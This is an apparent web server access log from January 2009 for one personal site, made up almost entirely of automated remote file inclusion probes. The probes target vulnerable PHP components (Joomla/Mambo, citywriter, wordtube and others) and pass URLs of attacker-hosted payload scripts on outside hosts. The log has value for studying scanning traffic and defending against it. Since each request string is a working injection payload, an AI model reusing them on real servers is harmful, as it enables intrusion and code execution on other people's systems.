216.14.80.68 - - [04/Jan/2009:09:22:33 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:09:22:33 -0800] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:09:22:33 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:22:47 -0800] "GET /logs/access_071228.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://spass.huneck.eu/id/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:22:58 -0800] "GET /logs/access_080324.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://spass.huneck.eu/id/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:23:11 -0800] "GET /logs/access_080903.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:23:12 -0800] "GET /logs/access_071221.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://spass.huneck.eu/id/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:23:22 -0800] "GET /logs/access_080903.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.8.172.68 - - [04/Jan/2009:09:23:27 -0800] "GET /?mosConfig_absolute_path=http://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 200 94868 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:23:34 -0800] "GET /logs/access_080117.log/homepage.php?sel=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:23:34 -0800] "GET /logs/access.log/homepage.php?sel=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:09:24:02 -0800] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:09:24:06 -0800] "GET /logs/access_080509.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [04/Jan/2009:09:24:19 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/finger/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Jan/2009:09:24:19 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/finger/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:24:35 -0800] "GET /logs/access_081030.log/index1.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:09:24:56 -0800] "GET /logs/access_080207.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:09:25:27 -0800] "GET /logs//index.php?mosConfig_absolute_path=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:09:25:29 -0800] "GET /index.php?mosConfig_absolute_path=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 200 94873 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:25:58 -0800] "GET /logs/access_080115.log/index1.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:26:08 -0800] "GET /logs/access_080313.log/index1.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.19.42.210 - - [04/Jan/2009:09:26:17 -0800] "GET /logs//citywriter/head.php?path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.42.210 - - [04/Jan/2009:09:26:18 -0800] "GET /citywriter/head.php?path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:26:42 -0800] "GET /logs/access_080714.log/main.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:26:42 -0800] "GET /logs/main.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:26:53 -0800] "GET /logs/access_080207.log/main.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:09:26:58 -0800] "GET /homepage.php?sel=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:09:26:58 -0800] "GET /logs/access_080820.log/homepage.php?sel=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:09:26:58 -0800] "GET /logs/access_081105.log/homepage.php?sel=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:09:26:58 -0800] "GET /logs/homepage.php?sel=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:27:32 -0800] "GET /logs/access_080507.log%20%20/index1.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.7.173 - - [04/Jan/2009:09:27:53 -0800] "GET /logs/access_080716.log//?mosConfig_absolute_path=http://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
94.23.7.173 - - [04/Jan/2009:09:27:54 -0800] "GET /?mosConfig_absolute_path=http://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 200 94868 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
94.23.7.173 - - [04/Jan/2009:09:27:56 -0800] "GET /logs//?mosConfig_absolute_path=http://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 200 80891 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
94.23.7.173 - - [04/Jan/2009:09:28:11 -0800] "GET /logs/access_081209.log//?mosConfig_absolute_path=http://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:09:28:32 -0800] "GET /logs///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:09:28:36 -0800] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:28:38 -0800] "GET /logs/access_080707.log%20%20/index1.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.81.169 - - [04/Jan/2009:09:28:55 -0800] "GET /bikes/dteel/SeaSTOC07/?M=A HTTP/1.0" 200 973 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:28:56 -0800] "GET /logs/access_080223.log/errors.php?error=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:28:56 -0800] "GET /errors.php?error=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:28:56 -0800] "GET /logs/errors.php?error=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:09:28:56 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:29:01 -0800] "GET /logs//citywriter/head.php?path=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:29:01 -0800] "GET /logs/access_080806.log//citywriter/head.php?path=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:29:03 -0800] "GET /logs/access_080223.log/errors.php?error=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:29:03 -0800] "GET /errors.php?error=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:29:03 -0800] "GET /logs/errors.php?error=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:29:04 -0800] "GET /logs/access_080828.log/errors.php?error=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:29:06 -0800] "GET /logs/access_080828.log/errors.php?error=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:29:07 -0800] "GET /logs/access_080223.log/errors.php?error=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:29:07 -0800] "GET /errors.php?error=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:29:07 -0800] "GET /logs/errors.php?error=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:29:07 -0800] "GET /logs/access_080828.log/errors.php?error=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:29:09 -0800] "GET /logs/access_080512.log//citywriter/head.php?path=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:29:38 -0800] "GET /logs/access_080503.log///administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:29:40 -0800] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.38.13.108 - - [04/Jan/2009:09:29:42 -0800] "GET /logs/access_080814.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
218.38.13.108 - - [04/Jan/2009:09:29:42 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
218.38.13.108 - - [04/Jan/2009:09:29:42 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:29:44 -0800] "GET /logs///administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.234.200.132 - - [04/Jan/2009:09:29:48 -0800] "GET /citywriter/head.php?path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
200.234.200.132 - - [04/Jan/2009:09:29:49 -0800] "GET /logs/access_080806.log//citywriter/head.php?path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
200.234.200.132 - - [04/Jan/2009:09:29:49 -0800] "GET /logs//citywriter/head.php?path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
200.234.200.132 - - [04/Jan/2009:09:29:51 -0800] "GET /logs/access_080512.log//citywriter/head.php?path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:29:54 -0800] "GET /logs/access_080504.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:29:54 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
65.18.157.227 - - [04/Jan/2009:09:29:58 -0800] "GET /logs/index.php?pagina=http://www.novoftp.xpg.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.18.157.227 - - [04/Jan/2009:09:29:58 -0800] "GET /logs/access_080818.log/index.php?pagina=http://www.novoftp.xpg.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.18.157.227 - - [04/Jan/2009:09:30:00 -0800] "GET /index.php?pagina=http://www.novoftp.xpg.com.br/id1.txt?? HTTP/1.1" 200 94726 "-" "Mozilla/5.0" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:09:30:04 -0800] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:09:30:04 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:09:30:04 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:09:30:06 -0800] "GET /logs/access_080523.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.145.162.155 - - [04/Jan/2009:09:30:15 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.18.157.227 - - [04/Jan/2009:09:30:16 -0800] "GET /logs/access_080530.log/index.php?pagina=http://www.novoftp.xpg.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.145.162.155 - - [04/Jan/2009:09:30:17 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 200 95036 "-" "libwww-perl/5.803" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:09:30:25 -0800] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 200 95290 "-" "Mozilla/5.0" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:09:30:26 -0800] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:09:30:26 -0800] "GET /logs/access_080901.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:30:33 -0800] "GET /logs/access_080806.log//citywriter/head.php?path=http://www.viparenda.ru/includes/images/mraneti.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:30:34 -0800] "GET /citywriter/head.php?path=http://www.viparenda.ru/includes/images/mraneti.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:30:34 -0800] "GET /logs//citywriter/head.php?path=http://www.viparenda.ru/includes/images/mraneti.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.77.155 - - [04/Jan/2009:09:30:38 -0800] "GET /logs/access_080509.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.157.227 - - [04/Jan/2009:09:30:47 -0800] "GET /logs/access_080818.log%20%20/index.php?pagina=http://www.novoftp.xpg.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.18.157.227 - - [04/Jan/2009:09:30:52 -0800] "GET /logs/access_080530.log%20%20/index.php?pagina=http://www.novoftp.xpg.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:31:02 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:31:23 -0800] "GET /logs/access_080806.log%20%20//citywriter/head.php?path=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:31:23 -0800] "GET /logs/access_080506.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.115.213.189 - - [04/Jan/2009:09:31:23 -0800] "GET /logs/access_081206.log/?_shop_path=http://www.leegolf.com/vboard/data/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.189 - - [04/Jan/2009:09:31:24 -0800] "GET /?_shop_path=http://www.leegolf.com/vboard/data/safe.txt?? HTTP/1.1" 200 94770 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.189 - - [04/Jan/2009:09:31:26 -0800] "GET /logs/?_shop_path=http://www.leegolf.com/vboard/data/safe.txt?? HTTP/1.1" 200 80886 "-" "libwww-perl/5.79" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:31:31 -0800] "GET /logs/access_080418.log%20%20//citywriter/head.php?path=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.8.172.68 - - [04/Jan/2009:09:32:00 -0800] "GET /logs/access_080716.log//?mosConfig_absolute_pathhttp://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
213.8.172.68 - - [04/Jan/2009:09:32:01 -0800] "GET /?mosConfig_absolute_pathhttp://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 200 94732 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
213.8.172.68 - - [04/Jan/2009:09:32:04 -0800] "GET /logs//?mosConfig_absolute_pathhttp://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 200 80891 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:09:32:07 -0800] "GET /logs/access_080507.log/index1.php?choix=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:09:32:07 -0800] "GET /index1.php?choix=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:09:32:07 -0800] "GET /logs/access_080608.log/index1.php?choix=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:09:32:07 -0800] "GET /logs/index1.php?choix=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.8.172.68 - - [04/Jan/2009:09:32:34 -0800] "GET /logs/access_081209.log//?mosConfig_absolute_pathhttp://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:33:11 -0800] "GET /logs/access_080806.log//citywriter/head.php?path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
212.95.39.220 - - [04/Jan/2009:09:33:15 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:33:16 -0800] "GET /logs//citywriter/head.php?path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:33:16 -0800] "GET /citywriter/head.php?path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:33:17 -0800] "GET /logs/access_080512.log//citywriter/head.php?path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
66.249.73.140 - - [04/Jan/2009:09:33:36 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-008.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
67.19.89.98 - - [04/Jan/2009:09:33:38 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://owell.us/var/https/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
